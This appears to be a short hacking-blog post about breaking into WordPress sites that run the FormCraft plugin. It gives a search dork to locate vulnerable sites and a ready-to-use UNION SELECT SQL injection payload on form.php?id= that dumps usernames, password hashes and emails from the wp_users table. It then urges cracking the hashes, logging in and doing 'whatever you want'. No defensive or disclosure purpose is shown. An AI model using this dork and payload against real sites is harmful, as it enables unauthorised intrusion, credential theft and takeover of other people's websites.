Wordpress Site hacking Via SQLi

dork : inurl:/wp-content/plugins/formcraft/form.php?id=

exploit link :

form.php?id=3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7,8,9,10,11 FROM wp_users--

Username & Password will appear. Crack the pass then login & do whatever you want :)

Read more…